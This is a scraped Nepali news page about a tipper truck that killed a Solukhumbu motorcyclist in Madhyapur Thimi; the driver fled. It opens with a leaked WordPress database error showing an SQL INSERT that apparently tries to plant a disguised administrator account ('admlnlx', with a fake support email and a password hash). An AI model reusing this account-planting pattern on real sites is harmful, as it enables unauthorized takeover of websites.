WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B8IpNxk0nn82vU7MJKGxNE6ZYFtuem/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 15:27:51', '', 'admlnlx', 'admlnlx')

टिपरको ठक्करले सोलुखुम्बुका मोटारसाइकल चालक फ्रेम कुमार राईको मृत्‍यु – Gaule Khabar

टिपरको ठक्करले सोलुखुम्बुका मोटारसाइकल चालक फ्रेम कुमार राईको मृत्‍यु

टिपरको ठक्करले सोलुखुम्बुका मोटारसाइकल चालक फ्रेम कुमार राईको मृत्‍यु

गाउँले न्युज, १६ असार, काठमाण्डौ । अरनिको राजमार्ग सडकखण्ड अन्तर्गत मध्यपुर थिमि राधेराधेमा टिपरको ठक्करबाट मोटारसाइकल चालक थुलुङ दुधकोशी गाउँपालिका पञ्चनका २९ वर्षिय फ्रेम कुमार राईको मृत्यु भएको छ ।

प्रहरीका अनुसार आइतबार राति काठमाडौंबाट भक्तपुरतर्फ आउँदै गरेको बा ५ ख ५३४३ नम्बरको टिपरले सोही दिशातर्फ आउँदै गरेको प्रदेश ३ ००६ प ४९९४ नम्बरको मोटरसाइकललाई ठक्कर दिँदा मोटरसाइकल चालकको मृत्यु भएको हो ।

तीव्रगतिमा आएको टिपरले मोटरसाइकललाई ओभरटेक गर्न खोज्दा दुर्घटना भएको महानगरीय प्रहरी वृत्त थिमि प्रमुख डीएसपी शान्तिराज कोइरालाले बताए । मोटरसाइकललाई ठक्कर दिने टिपर चालक दुर्घटनापछि फरार छन् ।
टिपरको ठक्करबाट सख्त घाइते राईको उपचारको क्रममा मध्यपुर अस्पताल थिमिमा मृत्यु भएको प्रहरीले जनाएको छ ।

https://gaulenews.com/?p=46992

https://gaulenews.com/?p=46476

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका